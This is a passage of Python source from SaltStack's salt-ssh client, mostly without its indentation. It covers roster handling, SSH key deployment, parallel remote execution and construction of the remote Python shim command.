SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate keys.\n\n"
"You can probably resolve this by executing this script with "
"increased permissions via sudo or by running as root.\n"
"You could also use the '-c' option to supply a configuration "
"directory that you have permissions to read and write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if isinstance(hostname, str) and "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self, hostname=None, user=None):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=hostname if hostname else self.opts.get("tgt", ""),
user=user if user else self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {} has been added to the roster {}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {}: access denied".format(roster_file))
def _update_targets(self):
"""
Update targets in case a hostname was passed directly without the roster.
:return:
"""
hosts = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if not isinstance(hosts, (list, tuple)):
hosts = list([hosts])
_hosts = list()
for hostname in hosts:
_user = user
if "@" in hostname:
_user, hostname = hostname.split("@", 1)
if hostname == "*":
continue
if salt.utils.network.is_reachable_host(hostname):
_hosts.append(hostname)
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": _user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster(hostname=hostname, user=_user)
if self.tgt_type == "list":
self.opts["tgt"] = _hosts
elif _hosts:
self.opts["tgt"] = _hosts[0]
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
logging._acquireLock()
stdout, stderr, retcode = single.run()
logging._releaseLock()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
try:
logging._acquireLock()
routine = Process(target=self.handle_routine, args=args)
routine.start()
                except Exception:  # pylint: disable=broad-except
                    log.exception("Failed to start the routine for host %s", host)
finally:
logging._releaseLock()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception, it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error."
).format(host)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
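    # Illustrative example (hypothetical values, not from the source): for
    # self.argv = ["state.apply", "www", "test=True"], __arg_comps would roughly
    # yield fun="state.apply", args=["www"], kws={"test": True}, depending on how
    # salt.utils.args.parse_input interprets the yaml-ish values.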
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"{} thin dir already exists. Not running ssh_pre_flight script".format(
self.thin_dir
)
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script {} does not exist".format(
self.ssh_pre_flight
)
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if retcode != 0:
log.error(
"Error running ssh_pre_flight script {}".format(
self.ssh_pre_file
)
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: {}".format(
self.ssh_pre_file
)
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["thin_dir"] = self.opts["thin_dir"]
opts_pkg["master_tops"] = self.opts["master_tops"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
        Execute a script on the minion and then delete it
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
